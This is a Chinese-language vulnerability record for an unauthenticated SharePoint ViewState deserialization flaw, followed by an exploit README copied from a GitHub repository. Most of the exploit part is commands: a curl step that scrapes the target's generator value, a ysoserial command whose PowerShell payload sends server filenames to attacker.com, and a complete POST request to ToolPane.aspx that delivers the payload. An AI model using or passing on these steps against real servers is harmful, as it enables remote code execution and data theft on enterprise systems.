漏洞信息
漏洞名称: SharePoint 反序列化漏洞
漏洞编号:
漏洞类型: 反序列化
漏洞等级: 高危
漏洞描述: 该漏洞影响Microsoft SharePoint,一个广泛用于企业级文档管理和协作的平台。SharePoint允许团队共享、管理和访问信息,通常部署在企业内部网络中,支持多种业务功能。由于其广泛的应用,该漏洞的影响范围较大。漏洞类型为反序列化漏洞,技术根源在于SharePoint在处理ViewState参数时未充分验证输入,导致攻击者可以构造恶意的序列化数据,通过特定的POST请求执行任意代码。这种漏洞的利用不需要用户认证,攻击者可以通过网络直接发起攻击,实现远程代码执行,进而可能导致服务器数据泄露、服务中断或其他恶意操作。由于攻击者可以完全控制系统,该漏洞的安全风险极高,需要立即采取措施进行修补。
产品厂商: Microsoft
产品名称: SharePoint
来源: https://github.com/Udyz/CVE-2025-53770-Exploit
类型: CVE-2025:github search
仓库文件
来源概述
CVE-2025-53770-Exploit
First, get the __VIEWSTATEGENERATOR value from the target SharePoint page:
1
| curl -s https://target.com/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+'
|
Then, create a PowerShell ViewState payload using ysoserial.exe that lists a directory on the server and sends the filenames to an external URL:
1
2
3
4
5
6
7
| ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "powershell -nop -c \"dir 'C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \
--generator="<VIEWSTATE_GENERATOR>" \
--validationkey="<VALIDATION_KEY>" \
--validationalg="<VALIDATION_ALG>" \
--islegacy \
--minify
|
Finally, add the generated token to a POST request like this to execute the command on the server:
1
2
3
4
5
6
7
8
9
10
11
12
| POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close
MSOTlPn_Uri=http%3A%2F%2Fwww.itsc.org%2F_controltemplates%2F15%2FAclEditor.ascx&MSOTlPn_DWP=<GENERATED_PAYLOAD>
|